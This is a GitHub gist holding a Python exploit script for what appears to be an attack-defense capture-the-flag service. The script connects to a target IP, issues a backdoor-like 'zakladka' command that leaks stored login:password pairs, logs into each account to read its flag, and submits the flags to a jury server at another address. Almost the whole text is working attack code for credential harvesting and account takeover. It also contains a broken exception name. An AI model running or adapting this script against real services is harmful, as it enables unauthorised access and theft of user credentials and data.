Skip to content

Instantly share code, notes, and snippets.

@mrcat323
Created January 11, 2018 07:48
Show Gist options
  • Save mrcat323/1e18c736146f2ff7e436a7b0aff8bdb6 to your computer and use it in GitHub Desktop.
Save mrcat323/1e18c736146f2ff7e436a7b0aff8bdb6 to your computer and use it in GitHub Desktop.
Quadratically exploit
#!/usr/bin/env python3
import socket, sys, re
from time import sleep
s = socket.socket()
s.connect((sys.argv[1], 6666)) # connect to service, ip in first script arg
# Recv until string occurs
def recv_until(s, st):
buf = ''
while True:
buf += s.recv(100500).decode()
if st in buf:
break
return buf
recv_until(s, 'Enter your name:')
s.send(b'asd\n') # login
recv_until(s, '\n> ')
s.send(b'zakladka\n') # vulnerable command in service
l = recv_until(s, '\n> ') # get list of credentials in login1:password1\nlogin2:password2 format
creds = l.split('\n')
s.close()
for cred in creds: # for each login:password in list
try:
s2 = socket.socket() # open new connection
s2.connect((sys.argv[1], 6666)) # and connect to the service
recv_until(s2, 'Enter your name:')
s2.send(cred.split(':')[0].strip().encode() + b'\n') # enter login
sleep(0.5)
asd = s2.recv(100500).decode()
if "access to the premium functions" in asd: # if this account not contain flag
print('not valid')
continue # go to the next account
s2.send(cred.split(':')[1].strip().encode() + b'\n') # else send password
recv_until(s2, '\n> ')
s2.send(b'see\n') # view flag
flag = recv_until(s2, '\n> ')
jury = socket.socket()
jury.connect(('192.168.0.185', 31337)) # connect to jury
recv_until(jury, '\n') # get hello message
jury.send(re.findall('(\w{31}=)', flag)[0].encode() + b'\n') # send flag
print(jury.recv(100500).decode()) # print jury answer
s2.close()
except KeyboardError: # for ctrl-c exit
break
except:
continue # if something wrong go next
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment